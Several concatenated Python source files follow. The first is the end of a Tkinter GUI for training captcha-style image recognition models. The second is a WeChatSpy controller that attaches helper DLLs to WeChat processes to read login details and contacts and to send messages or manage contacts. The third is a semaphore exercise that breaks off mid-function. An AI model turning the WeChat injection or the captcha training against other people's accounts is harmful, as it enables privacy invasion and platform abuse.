self.data_augmentation_entity.binaryzation = model_conf.da_binaryzation
self.data_augmentation_entity.median_blur = model_conf.da_median_blur
self.data_augmentation_entity.gaussian_blur = model_conf.da_gaussian_blur
self.data_augmentation_entity.equalize_hist = model_conf.da_equalize_hist
self.data_augmentation_entity.laplace = model_conf.da_laplace
self.data_augmentation_entity.warp_perspective = model_conf.da_warp_perspective
self.data_augmentation_entity.rotate = model_conf.da_rotate
self.data_augmentation_entity.sp_noise = model_conf.da_sp_noise
self.data_augmentation_entity.brightness = model_conf.da_brightness
self.data_augmentation_entity.hue = model_conf.da_hue
self.data_augmentation_entity.saturation = model_conf.da_saturation
self.data_augmentation_entity.gamma = model_conf.da_gamma
self.data_augmentation_entity.channel_swap = model_conf.da_channel_swap
self.data_augmentation_entity.random_blank = model_conf.da_random_blank
self.data_augmentation_entity.random_transition = model_conf.da_random_transition
# Pretreatment settings (edited via the pretreatment dialog).
self.pretreatment_entity.binaryzation = model_conf.pre_binaryzation
self.pretreatment_entity.replace_transparent = model_conf.pre_replace_transparent
self.pretreatment_entity.horizontal_stitching = model_conf.pre_horizontal_stitching
self.pretreatment_entity.concat_frames = model_conf.pre_concat_frames
self.pretreatment_entity.blend_frames = model_conf.pre_blend_frames
# TFRecords listboxes are refilled last.
for dataset_validation in self.get_param(model_conf.validation_path, DatasetType.TFRecords, default=[]):
self.dataset_validation_listbox.insert(tk.END, dataset_validation)
for dataset_train in self.get_param(model_conf.trains_path, DatasetType.TFRecords, default=[]):
self.dataset_train_listbox.insert(tk.END, dataset_train)
return model_conf
@property
def validation_batch_size(self):
    """Validation batch size as entered in the GUI.

    NOTE: a clamped variant (min of batch size and validation-set size when
    only one validation record exists) was tried and disabled upstream.
    """
    return self.validation_batch_size_val.get()
@property
def device_usage(self):
    """Device memory-usage fraction currently selected in the GUI."""
    return self.edit_var.get()
def save_conf(self):
"""Persist the entire GUI state into the project's ModelConfig and write it to disk.

:return: the written ModelConfig, or None when no project is selected
"""
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
# Every keyword below maps one GUI widget/property to a config key.
model_conf = ModelConfig(
project_name=self.current_project,
MemoryUsage=self.device_usage,
CNNNetwork=self.neu_cnn,
RecurrentNetwork=self.neu_recurrent,
UnitsNum=self.units_num_spin.get(),
Optimizer=self.optimizer,
LossFunction=self.loss_func,
Decoder=self.comb_loss.get(),
ModelName=self.current_project,
ModelField=ModelField.Image.value,
ModelScene=ModelScene.Classification.value,
Category=self.category,
Resize=self.resize,
ImageChannel=self.comb_channel.get(),
ImageWidth=self.image_width,
ImageHeight=self.image_height,
MaxLabelNum=self.label_num_spin.get(),
AutoPadding=True,
ReplaceTransparent=False,
HorizontalStitching=False,
OutputSplit='',
# Labels are taken from the file name, up to the first underscore.
LabelFrom=LabelFrom.FileName.value,
ExtractRegex='.*?(?=_)',
LabelSplit='',
DatasetTrainsPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Trains
),
DatasetValidationPath=self.dataset_value(
dataset_type=DatasetType.TFRecords, mode=RunMode.Validation
),
SourceTrainPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Trains
),
SourceValidationPath=self.dataset_value(
dataset_type=DatasetType.Directory, mode=RunMode.Validation
),
ValidationSetNum=self.validation_num_val.get(),
SavedSteps=100,
ValidationSteps=500,
EndAcc=self.end_acc_val.get(),
EndCost=self.end_cost_val.get(),
EndEpochs=self.end_epochs_spin.get(),
BatchSize=self.batch_size_val.get(),
ValidationBatchSize=self.validation_batch_size,
LearningRate=self.learning_rate_spin.get(),
# Data-augmentation flags, as edited in the augmentation dialog.
DA_Binaryzation=self.data_augmentation_entity.binaryzation,
DA_MedianBlur=self.data_augmentation_entity.median_blur,
DA_GaussianBlur=self.data_augmentation_entity.gaussian_blur,
DA_EqualizeHist=self.data_augmentation_entity.equalize_hist,
DA_Laplace=self.data_augmentation_entity.laplace,
DA_WarpPerspective=self.data_augmentation_entity.warp_perspective,
DA_Rotate=self.data_augmentation_entity.rotate,
DA_PepperNoise=self.data_augmentation_entity.sp_noise,
DA_Brightness=self.data_augmentation_entity.brightness,
DA_Saturation=self.data_augmentation_entity.saturation,
DA_Hue=self.data_augmentation_entity.hue,
DA_Gamma=self.data_augmentation_entity.gamma,
DA_ChannelSwap=self.data_augmentation_entity.channel_swap,
DA_RandomBlank=self.data_augmentation_entity.random_blank,
DA_RandomTransition=self.data_augmentation_entity.random_transition,
# Pretreatment flags, as edited in the pretreatment dialog.
Pre_Binaryzation=self.pretreatment_entity.binaryzation,
Pre_ReplaceTransparent=self.pretreatment_entity.replace_transparent,
Pre_HorizontalStitching=self.pretreatment_entity.horizontal_stitching,
Pre_ConcatFrames=self.pretreatment_entity.concat_frames,
Pre_BlendFrames=self.pretreatment_entity.blend_frames,
)
model_conf.update()
return model_conf
def make_dataset(self):
"""Build TFRecords from the configured sample directories on a background thread."""
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
if self.is_task_running:
messagebox.showerror(
"Error!", "Please terminate the current training first or wait for the training to end."
)
return
self.save_conf()
# Disable the button until the background job calls back.
self.button_state(self.btn_make_dataset, tk.DISABLED)
model_conf = ModelConfig(self.current_project)
train_path = self.dataset_value(DatasetType.Directory, RunMode.Trains)
validation_path = self.dataset_value(DatasetType.Directory, RunMode.Validation)
if len(train_path) < 1:
messagebox.showerror(
"Error!", "{} Sample set has not been added.".format(RunMode.Trains.value)
)
self.button_state(self.btn_make_dataset, tk.NORMAL)
return
self.threading_exec(
lambda: DataSets(model_conf).make_dataset(
trains_path=train_path,
validation_path=validation_path,
is_add=False,
callback=lambda: self.button_state(self.btn_make_dataset, tk.NORMAL),
msg=lambda x: tk.messagebox.showinfo('Make Dataset Status', x)
)
)
@property
def size(self):
# [width, height] parsed from the size entry (JSON list of ints).
return self.json_filter(self.size_val.get(), int)
@property
def image_height(self):
# Height component of the parsed size.
return self.size[1]
@property
def image_width(self):
# Width component of the parsed size.
return self.size[0]
@property
def resize(self):
# [width, height] the input images are resized to (JSON list of ints).
return self.json_filter(self.resize_val.get(), int)
@property
def neu_cnn(self):
# Selected CNN backbone name.
return self.comb_neu_cnn.get()
@property
def neu_recurrent(self):
# Selected recurrent-layer name.
return self.comb_recurrent.get()
@property
def loss_func(self):
# Selected loss-function name.
return self.comb_loss.get()
@property
def optimizer(self):
# Selected optimizer name.
return self.comb_optimizer.get()
@staticmethod
def json_filter(content, item_type):
if not content:
messagebox.showerror(
"Error!", "To select a customized category, you must specify the category set manually."
)
return None
try:
content = json.loads(content)
except ValueError as e:
messagebox.showerror(
"Error!", "Input must be of type JSON."
)
return None
content = [item_type(i) for i in content]
return content
@property
def category(self):
    """Resolve the category setting: a built-in name, or a parsed custom list."""
    selected = self.comb_category.get()
    if not selected:
        messagebox.showerror(
            "Error!", "Please select built-in category or custom category first"
        )
        return None
    if selected != 'CUSTOMIZED':
        return selected
    raw = self.category_entry.get()
    # Tolerate single-quoted pseudo-JSON by normalising quotes first.
    if "'" in raw:
        raw = raw.replace("'", '"')
    return self.json_filter(raw, str)
def dataset_value(self, dataset_type: DatasetType, mode: RunMode):
    """Return all paths currently listed for the given dataset type and run mode."""
    box = self.sample_map[dataset_type][mode]
    return list(box.get(0, box.size() - 1))
def compile_task(self):
"""Compile (freeze) the trained model graph; reports status via dialogs."""
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
model_conf = ModelConfig(project_name=self.current_project)
if not os.path.exists(model_conf.model_root_path):
messagebox.showerror(
"Error", "Model storage folder does not exist."
)
return
# Fewer than 3 files in the model dir means no checkpoint was written yet.
if len(os.listdir(model_conf.model_root_path)) < 3:
messagebox.showerror(
"Error", "There is no training model record, please train before compiling."
)
return
try:
self.current_task = Trains(model_conf)
self.current_task.compile_graph(0)
status = 'Compile completed'
except Exception as e:
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args, ensure_ascii=False)
)
status = 'Compile failure'
tk.messagebox.showinfo('Compile Status', status)
def compile(self):
    """Compile the trained model on a background thread (non-blocking)."""
    # NOTE: the method name intentionally mirrors the GUI action and shadows
    # the builtin `compile` only within instance attribute lookup.
    self.job = self.threading_exec(self.compile_task)
def training_task(self):
"""Run the blocking training loop; toggles Start/Stop buttons and the running flag."""
model_conf = ModelConfig(project_name=self.current_project)
self.current_task = Trains(model_conf)
try:
self.button_state(self.btn_training, tk.DISABLED)
self.button_state(self.btn_stop, tk.NORMAL)
self.is_task_running = True
self.current_task.train_process()
status = 'Training completed'
except Exception as e:
traceback.print_exc()
messagebox.showerror(
e.__class__.__name__, json.dumps(e.args, ensure_ascii=False)
)
status = 'Training failure'
# Restore button states regardless of success or failure.
self.button_state(self.btn_training, tk.NORMAL)
self.button_state(self.btn_stop, tk.DISABLED)
self.is_task_running = False
tk.messagebox.showinfo('Training Status', status)
@staticmethod
def check_dataset(model_conf):
    """Verify that TFRecords paths are configured and present on disk."""
    trains_path = model_conf.trains_path[DatasetType.TFRecords]
    validation_path = model_conf.validation_path[DatasetType.TFRecords]
    if not trains_path or not validation_path:
        messagebox.showerror(
            "Error!", "Training set or validation set not defined."
        )
        return False
    checks = (
        (trains_path, "Training set path does not exist, please make dataset first"),
        (validation_path, "Validation set path does not exist, please make dataset first"),
    )
    for paths, message in checks:
        for path in paths:
            if not os.path.exists(path):
                messagebox.showerror("Error!", message)
                return False
    return True
def start_training(self):
"""Validate the configuration, persist it, then launch training on a background thread."""
if not self.check_resize():
return
if not self.current_project:
messagebox.showerror(
"Error!", "Please set the project name first."
)
return
# save_conf() persists the GUI state and returns the resulting ModelConfig.
model_conf = self.save_conf()
if not self.check_dataset(model_conf):
return
self.job = self.threading_exec(
lambda: self.training_task()
)
def stop_training(self):
"""Ask the running training task to stop by raising its stop flag."""
self.current_task.stop_flag = True
@property
def project_names(self):
    """Names of all project sub-directories under the project root."""
    names = []
    for entry in os.scandir(self.project_root_path):
        if entry.is_dir():
            names.append(entry.name)
    return names
def fetch_projects(self):
    """Refresh the project combobox choices from the projects directory."""
    self.comb_project_name["values"] = self.project_names
def browse_dataset(self, dataset_type: DatasetType, mode: RunMode):
"""Pick a sample directory and add it (or its immediate sub-directories) to the listbox."""
if not self.current_project:
messagebox.showerror(
"Error!", "Please define the project name first."
)
return
filename = filedialog.askdirectory()
if not filename:
return
is_sub = False
# When the chosen directory contains sub-directories, each of them is
# added instead of the parent.
for i, item in enumerate(os.scandir(filename)):
if item.is_dir():
path = item.path.replace("\\", "/")
# The first path added to an empty listbox also triggers
# sample auto-detection (category/size/label count).
if self.sample_map[dataset_type][mode].size() == 0:
self.fetch_sample([path])
self.sample_map[dataset_type][mode].insert(tk.END, path)
if i > 0:
continue
is_sub = True
else:
# NOTE(review): the first non-directory entry aborts the scan
# entirely — confirm this is intended rather than `continue`.
break
if not is_sub:
filename = filename.replace("\\", "/")
if self.sample_map[dataset_type][mode].size() == 0:
self.fetch_sample([filename])
self.sample_map[dataset_type][mode].insert(tk.END, filename)
@staticmethod
def closest_category(category):
    """Return the built-in category whose character set is the smallest
    superset of *category*, or None when no built-in set covers it.
    """
    wanted = set(category)
    surplus = {}
    for key in SIMPLE_CATEGORY_MODEL.keys():
        candidate = set(category_extract(key))
        if wanted <= candidate:
            surplus[key] = len(candidate) - len(wanted)
    if not surplus:
        return None
    # First key (in insertion order) with the minimal surplus wins,
    # matching the original scan.
    return min(surplus, key=surplus.get)
def fetch_sample(self, dataset_path):
    """Inspect up to 100 sample files to auto-fill category, size and label count.

    Samples are expected to be named "<label>_<anything>"; each character of
    the label counts as one category element.
    """
    file_names = os.listdir(dataset_path[0])[0:100]
    # Robustness fix: an empty directory previously crashed with IndexError
    # when reading file_names[0] below.
    if not file_names:
        return
    category = list()
    len_label = -1
    for file_name in file_names:
        if "_" in file_name:
            label = file_name.split("_")[0]
            # Cleanup: extending with the string directly is equivalent to
            # the former per-character list conversion.
            len_label = len(label)
            category.extend(label)
    category_pram = self.closest_category(category)
    if not category_pram:
        return
    self.comb_category.set(category_pram)
    size = PilImage.open(os.path.join(dataset_path[0], file_names[0])).size
    self.size_val.set(json.dumps(size))
    self.resize_val.set(json.dumps(size))
    self.label_num_spin.set(len_label)
def listbox_delete_item_callback(self, event, listbox: tk.Listbox):
    """Delete the selected listbox row and persist the configuration.

    Bug fix: pressing Delete with nothing selected used to raise IndexError
    on the empty curselection() tuple.
    """
    selection = listbox.curselection()
    if not selection:
        return
    listbox.delete(selection[0])
    self.save_conf()
def comb_category_callback(self, event):
    """Enable the custom-category entry only for the CUSTOMIZED choice."""
    if self.comb_category.get() == 'CUSTOMIZED':
        self.category_entry['state'] = tk.NORMAL
        return
    # Built-in category: wipe and lock the custom entry.
    self.category_entry.delete(0, tk.END)
    self.category_entry['state'] = tk.DISABLED
def check_resize(self):
    """Validate that the resize shape is compatible with the label count.

    CTC places no constraint on the flattened feature size, so it always
    passes.  Otherwise the flattened CNN output
    (ceil(w/stride) * ceil(h/stride) * channels) must divide evenly by the
    number of labels.
    """
    if self.loss_func == 'CTC':
        return True
    param = OUTPUT_SHAPE1_MAP[NETWORK_MAP[self.neu_cnn]]
    shape1w = math.ceil(1.0*self.resize[0]/param[0])
    shape1h = math.ceil(1.0*self.resize[1]/param[0])
    input_s1 = shape1w * shape1h * param[1]
    label_num = int(self.label_num_spin.get())
    # Robustness fix: a zero label count previously raised ZeroDivisionError.
    if label_num == 0:
        messagebox.showerror(
            "Error!", "The label num must be greater than 0."
        )
        return False
    if input_s1 % label_num != 0:
        messagebox.showerror(
            "Error!", "Shape[1] = {} must divide the label_num = {}.".format(input_s1, label_num)
        )
        return False
    return True
@staticmethod
def resource_path(relative_path):
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except AttributeError:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
if __name__ == '__main__':
# Script entry point: build the Tk root window and run the wizard GUI.
root = tk.Tk()
app = Wizard(root)
root.mainloop()
|
spy.py | import os
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from .exceptions import ParserError
import logging
import warnings
from uuid import uuid4
from .proto import spy_pb2
from .command import *
from ctypes import cdll, c_char_p
class WeChatSpy:
def __init__(self, parser=None, key: str = None, logger: logging.Logger = None):
"""Spy controller: accepts socket connections from injected WeChat
processes and dispatches protobuf messages to *parser*.

:param parser: callable invoked with each non-system Response message
:param key: commercial licence key, pushed to every new client when set
:param logger: optional custom logger; a DEBUG stream logger is built otherwise
"""
# Commercial licence key
self.__key = key
# Logging setup
if isinstance(logger, logging.Logger):
# Use the caller-supplied logger
self.logger = logger
else:
# Fall back to a default DEBUG-level stream logger
self.logger = logging.getLogger(__file__)
formatter = logging.Formatter('%(asctime)s [%(threadName)s] %(levelname)s: %(message)s')
sh = logging.StreamHandler()
sh.setFormatter(formatter)
sh.setLevel(logging.DEBUG)
self.logger.addHandler(sh)
self.logger.setLevel(logging.DEBUG)
# Handler for data arriving on the client sockets
if callable(parser):
self.__parser = parser
else:
raise ParserError("Parser must be callable")
# port -> connected client socket; pid -> port (filled on handshake)
self.__port2client = dict()
self.__pid2port = dict()
host = "127.0.0.1"
port = 9527
self.__socket_server = socket(AF_INET, SOCK_STREAM)
self.__socket_server.bind((host, port))
self.__socket_server.listen(1)
# Accept loop runs on a daemon thread so it dies with the process.
t_start_server = Thread(target=self.__start_server)
t_start_server.daemon = True
t_start_server.name = "spy"
t_start_server.start()
current_path = os.path.split(os.path.abspath(__file__))[0]
helper_path = os.path.join(current_path, "SpyHelper.exe")
# Launch the injector helper; os.system blocks, hence the daemon thread.
attach_thread = Thread(target=os.system, args=(helper_path,))
attach_thread.daemon = True
attach_thread.name = "attach"
attach_thread.start()
def __start_server(self):
"""Accept loop: register each connecting WeChat process and spawn a receiver thread."""
while True:
socket_client, client_address = self.__socket_server.accept()
self.__port2client[client_address[1]] = socket_client
self.logger.info(f"A WeChat process from {client_address} successfully connected")
# Push the commercial key to the new client as soon as it connects.
if self.__key:
self.set_commercial(self.__key, port=client_address[1])
t_socket_client_receive = Thread(target=self.receive, args=(socket_client, client_address))
t_socket_client_receive.name = f"wechat {client_address}"
t_socket_client_receive.daemon = True
t_socket_client_receive.start()
def receive(self, socket_client: socket, client_address: tuple):
"""Read length-prefixed protobuf frames from one client socket.

Wire format: 4-byte little-endian payload length, then the serialized
spy_pb2.Response.  SYSTEM messages are logged locally; everything else
is dispatched to the user parser on a fresh daemon thread.
"""
recv_byte = b""
data_size = 0  # payload length of the frame being assembled; 0 = waiting for a header
while True:
try:
_bytes = socket_client.recv(4096)
except Exception as e:
return self.logger.warning(f"The WeChat process has disconnected: {e}")
recv_byte += _bytes
# Drain every complete frame currently buffered.
while True:
if not data_size:
if len(recv_byte) > 3:
data_size = int.from_bytes(recv_byte[:4], "little")
else:
break
elif data_size <= len(recv_byte) - 4:
data_byte = recv_byte[4: data_size + 4]
response = spy_pb2.Response()
response.ParseFromString(data_byte)
# Tag the message with the client port so replies can be routed.
response.port = client_address[1]
recv_byte = recv_byte[data_size + 4:]
data_size = 0
if response.type == SYSTEM:
if response.info:
self.logger.info(f"{response.info}")
elif response.warning:
self.logger.warning(f"{response.warning}")
elif response.error:
self.logger.error(f"{response.error}")
else:
# Remember pid -> port on the initial handshake message.
if response.type == WECHAT_CONNECTED:
self.__pid2port[response.pid] = client_address[1]
t = Thread(target=self.__parser, args=(response,))
t.name = f"wechat {client_address}"
t.daemon = True
t.start()
else:
break
def __send(self, request: spy_pb2.Request, pid: int = 0, port: int = 0):
"""Serialize *request* and send it to one client, length-prefixed.

Routing: an explicit *port* wins; a *pid* is translated to its port
(deprecated); with neither, the first connected client is used.
:return: True on success, False when no client was found or the send failed
"""
if pid:
self.logger.warning(
"We recommend using the parameter 'port' to distinguish between multiple different WeChat clients.")
if not (port := self.__pid2port.get(pid)):
self.logger.error(f"Failure to find port by pid:{pid}")
return False
if not port and self.__port2client:
# No routing hint: fall back to the first connected client.
socket_client = list(self.__port2client.values())[0]
elif not (socket_client := self.__port2client.get(port)):
self.logger.error(f"Failure to find socket client by port:{port}")
return False
# Every request carries a fresh uuid so replies can be correlated.
request.uuid = uuid4().__str__()
data = request.SerializeToString()
# 4-byte little-endian length prefix, mirroring receive().
data_length_bytes = int.to_bytes(len(data), length=4, byteorder="little")
try:
socket_client.send(data_length_bytes + data)
return True
except Exception as e:
self.logger.warning(f"The WeChat process {port} has disconnected: {e}")
return False
def run(self, wechat: str, bit: int = 64):
"""Launch a WeChat client via the helper DLL and return its pid.

:param wechat: path to the WeChat executable
:param bit: DLL flavour to load — 64 loads SpyHelper_x64.dll, anything else x86
:return: pid of the launched process, or 0 on failure
"""
current_path = os.path.split(os.path.abspath(__file__))[0]
if bit == 64:
dll_path = os.path.join(current_path, "SpyHelper_x64.dll")
else:
dll_path = os.path.join(current_path, "SpyHelper_x86.dll")
try:
dll = cdll.LoadLibrary(dll_path)
except FileNotFoundError:
# NOTE(review): message says "OpenHelper" while the DLL is named
# SpyHelper — confirm the intended wording.
self.logger.error("OpenHelper not found")
return 0
except OSError as e:
# errno 8 (exec format error): wrong bitness — retry with the other DLL.
if e.errno == 8:
return self.run(wechat, 64) if bit != 64 else self.run(wechat, 32)
self.logger.error(e)
return 0
pid = dll.OpenWeChat(c_char_p(wechat.encode()))
return pid
def set_commercial(self, key: str, pid: int = 0, port: int = 0):
"""Register the commercial licence *key* with a client process."""
request = spy_pb2.Request()
request.cmd = SYSTEM
request.content = key
# Explicitly blank uuid; __send assigns a fresh one before sending.
request.uuid = ""
self.__send(request, pid, port)
def get_login_info(self, pid: int = 0, port: int = 0):
"""
Get the current login information.
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = LOGIN_INFO
return self.__send(request, pid, port)
def query_login_info(self, pid: int = 0, port: int = 0):
    """Deprecated alias kept for backward compatibility; use get_login_info()."""
    warnings.warn(
        "The function 'query_login_info' is deprecated, and has been replaced by the function 'get_login_info'",
        DeprecationWarning)
    return self.get_login_info(pid, port)
def get_contacts(self, pid: int = 0, port: int = 0):
"""
Get the contact list.
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = CONTACTS
return self.__send(request, pid, port)
def query_contact_list(self, pid: int = 0, port: int = 0):
    """Deprecated alias kept for backward compatibility; use get_contacts()."""
    # Bug fix: the warning previously pointed callers at a non-existent
    # 'get_contact_list'; the actual replacement is 'get_contacts'.
    warnings.warn(
        "The function 'query_contact_list' is deprecated, and has been replaced by the function 'get_contacts'",
        DeprecationWarning)
    return self.get_contacts(pid, port)
def get_contact_details(self, wxid: str, update: bool = False, pid: int = 0, port: int = 0):
"""
获取联系人详情
:param wxid: 联系人wxid
:param update: 是否更新最新详情(需请求微信服务器 速度较慢)
:param pid:
:param port:
"""
request = spy_pb2.Request()
request.cmd = CONTACT_DETAILS
request.wxid = wxid
request.update = 1 if update else 0
return self.__send(request, pid, port)
def query_contact_details(self, wxid: str, update: bool = False, pid: int = 0, port: int = 0):
warnings.warn(
"The function 'query_contact_details' is deprecated, "
"and has been replaced by the function 'get_contact_details'", DeprecationWarning)
return self.get_contact_details(wxid, update, pid, port)
def get_chatroom_members(self, wxid: str, pid: int = 0, port: int = 0):
"""
获取群成员列表
:param wxid: 群wxid
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = CHATROOM_MEMBERS
request.wxid = wxid
return self.__send(request, pid, port)
def query_chatroom_member(self, wxid: str, pid: int = 0, port: int = 0):
warnings.warn(
"The function 'query_chatroom_member' is deprecated, "
"and has been replaced by the function 'get_chatroom_members'", DeprecationWarning)
return self.get_chatroom_members(wxid, pid, port)
def send_text(self, wxid: str, content: str, at_wxid: str = "", pid: int = 0, port: int = 0):
"""
发送文本消息
:param wxid: 文本消息接收wxid
:param content: 文本消息内容
:param at_wxid: 如果wxid为群wxid且需要@群成员 此参数为被@群成员wxid,以英文逗号分隔
:param pid:
:param port:
"""
if not wxid.endswith("chatroom"):
at_wxid = ""
request = spy_pb2.Request()
request.cmd = SEND_TEXT
request.wxid = wxid
request.at_wxid = at_wxid
request.content = content
return self.__send(request, pid, port)
def send_image(self, wxid: str, image_path: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'send_image' is deprecated, and has been replaced by the function 'send_file'",
DeprecationWarning)
return self.send_file(wxid, image_path, pid, port)
def send_file(self, wxid: str, file_path: str, pid: int = 0, port: int = 0):
"""
发送文件消息
:param wxid: 文件消息接收wxid
:param file_path: 文件路径
:param pid:
:param port:
"""
if len(file_path.split("\\")) > 8:
return self.logger.warning(f"File path is too long: {file_path}")
request = spy_pb2.Request()
request.cmd = SEND_FILE
request.wxid = wxid
request.content = file_path
return self.__send(request, pid, port)
def accept_new_contact(self, encryptusername: str, ticket: str, pid: int = 0, port: int = 0):
"""
接受好友请求
:param encryptusername:
:param ticket:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = ACCEPT_CONTACT
request.encryptusername = encryptusername
request.ticket = ticket
return self.__send(request, pid, port)
def send_announcement(self, wxid: str, content: str, pid: int = 0, port: int = 0):
"""
发送群公共
:param wxid: 群wxid
:param content: 公告内容
:param pid:
:param port:
:return:
"""
if not wxid.endswith("chatroom"):
return self.logger.warning("Can only send announcements to chatrooms")
request = spy_pb2.Request()
request.cmd = SEND_ANNOUNCEMENT
request.wxid = wxid
request.content = content
return self.__send(request, pid, port)
def create_chatroom(self, wxid: str, pid: int = 0, port: int = 0):
"""
创建群聊
:param wxid: wxid,以","分隔 至少需要两个
:param pid:
:param port:
:return:
"""
if len(wxid.split(",")) < 2:
return self.logger.warning("This function requires at least two wxids separated by ','")
request = spy_pb2.Request()
request.cmd = CREATE_CHATROOM
request.wxid = wxid
return self.__send(request, pid, port)
def share_chatroom(self, chatroom_wxid: str, wxid: str, pid: int = 0, port: int = 0):
"""
分享群聊邀请链接
:param chatroom_wxid:
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = SHARE_CHATROOM
request.wxid = wxid
request.chatroom_wxid = chatroom_wxid
return self.__send(request, pid, port)
def remove_chatroom_member(self, chatroom_wxid: str, wxid: str, pid: int = 0, port: int = 0):
"""
移除群成员
:param chatroom_wxid:
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = REMOVE_CHATROOM_MEMBER
request.wxid = wxid
request.chatroom_wxid = chatroom_wxid
return self.__send(request, pid, port)
def remove_contact(self, wxid: str, pid: int = 0, port: int = 0):
"""
移除联系人
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = REMOVE_CONTACT
request.wxid = wxid
return self.__send(request, pid, port)
    def add_contact(self, wxid: str, chatroom_wxid: str = "", greeting: str = "",
                    add_type: int = 1, pid: int = 0, port: int = 0):
        """
        Add a contact.
        add_type = 313: wxid, chatroom_wxid and greeting required
        add_type = 314: wxid and greeting required
        add_type = 315: wxid required
        :param wxid: target user's wxid
        :param chatroom_wxid: chatroom the target user belongs to
        :param greeting: greeting message sent with the request
        :param add_type: 313: add from a chatroom; 314: we were deleted by the
            peer; 315: the peer was deleted by us
        :param pid:
        :param port:
        :return: send result, or None when the guard below bails out
        """
        request = spy_pb2.Request()
        request.wxid = wxid
        # NOTE(review): the documented add_type values are 313/314/315, yet the
        # default is 1 and this guard tests `add_type == 1` — presumably it was
        # meant to require chatroom_wxid for the "from chatroom" type
        # (ADD_CONTACT_A, see add_contact_from_chatroom below); confirm against
        # the ADD_CONTACT_* constants before relying on the default.
        if add_type == 1 and not chatroom_wxid:
            return
        request.cmd = add_type
        request.chatroom_wxid = chatroom_wxid
        request.content = greeting
        return self.__send(request, pid, port)
def add_contact_from_chatroom(self, chatroom_wxid: str, wxid: str, msg: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'add_contact_from_chatroom' is deprecated, "
"and has been replaced by the function 'add_contact'", DeprecationWarning)
return self.add_contact(wxid, chatroom_wxid, msg, ADD_CONTACT_A, pid, port)
def add_unidirectional_contact_a(self, wxid: str, msg: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'add_unidirectional_contact_a' is deprecated, "
"and has been replaced by the function 'add_contact'", DeprecationWarning)
return self.add_contact(wxid, "", msg, ADD_CONTACT_B, pid, port)
def add_unidirectional_contact_b(self, wxid: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'add_unidirectional_contact_b' is deprecated, "
"and has been replaced by the function 'add_contact'", DeprecationWarning)
return self.add_contact(wxid, "", "", ADD_CONTACT_C, pid, port)
def get_contact_status(self, wxid: str, pid: int = 0, port: int = 0):
"""
获取联系人状态
:param wxid:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = CONTACT_STATUS
request.wxid = wxid
return self.__send(request, pid, port)
def check_contact_status(self, wxid: str, pid: int = 0, port: int = 0):
warnings.warn("The function 'check_contact_status' is deprecated, "
"and has been replaced by the function 'get_contact_status'", DeprecationWarning)
return self.get_contact_status(wxid, pid, port)
def set_chatroom_name(self, wxid: str, name: str, pid: int = 0, port: int = 0):
"""
设置群聊名称
:param wxid:
:param name:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = SET_CHATROOM_NAME
request.wxid = wxid
request.content = name
return self.__send(request, pid, port)
def set_save_folder(self, folder: str, pid: int = 0, port: int = 0):
"""
设置保存路径
:param folder:
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = SET_SAVE_FOLDER
request.content = folder
return self.__send(request, pid, port)
def show_qrcode(self, output_path: str = "", pid: int = 0, port: int = 0):
"""
显示登录二维码
:param output_path: 输出文件路径
:param pid:
:param port:
:return:
"""
request = spy_pb2.Request()
request.cmd = QRCODE
request.content = output_path
return self.__send(request, pid, port)
|
tribe_of_savages.py | #!/usr/bin/env python
"""tribe_of_savages.py: A tribe eats dinners from a pot that holds M shares.
When a savage wants to eat he helps himself, if the pot is empty he wakes the cook
the savages wait until the cook completely fills the pot. The cook refills only when
the pot is empty. There is only one cook and an arbitrary amount of savages.
Solve using semaphores."""
__author__ = "Justin Overstreet"
__copyright__ = "oversj96.github.io"
import threading
from multiprocessing import Process
from random import *
import time
# Semaphore the savages use to wake the cook. It starts at 1, so fill_pot's
# very first acquire() succeeds immediately: the pot is "refilled" once at
# startup even though it is already full.
cook = threading.Semaphore(1)
# Binary semaphore acting as the mutex that guards the shared `shares` pot.
pot_access = threading.Semaphore(1)
shares = 20  # can be any value
def fill_pot():
    """Cook thread: block until woken via `cook`, then refill the pot.

    Runs forever; each iteration waits on the `cook` semaphore (released by a
    savage who finds the pot empty) and resets `shares` under `pot_access`.
    """
    global shares
    while True:
        print("The cook goes to sleep")
        cook.acquire()
        print("The cook is awake")
        pot_access.acquire()
        print("The cook has taken the pot")
        # NOTE(review): the refill amount is hard-coded to 20 here rather than
        # sharing a single constant with the module-level initial value.
        shares = 20
        pot_access.release()
        print("The cook has refilled the pot")
def savage():
    """One savage: wake the cook if the pot looks empty, then take a share.

    NOTE(review): `shares` is read before `pot_access` is acquired, and after
    releasing `cook` the savage does not wait for the refill before drawing,
    so under truly concurrent savages `shares` could briefly go negative.
    With the single generate_savages() driver the calls are sequential, which
    masks this — confirm intent before reusing with multiple savage threads.
    """
    global shares
    print("A savage has come to eat!")
    if shares == 0:
        print("The pot is empty and a savage has woken the cook")
        cook.release()
    print("A savage wants to draw from the pot!")
    pot_access.acquire()
    print("A savage draws from the pot")
    shares -= 1
    pot_access.release()
    print("A savage has eaten and left")
def generate_savages():
    """Driver thread: run random-sized batches of savages, napping between.

    Each batch serves between 1 and 29 savages sequentially, then sleeps for
    0-5 seconds before the next batch. Runs forever.
    """
    global shares
    while True:
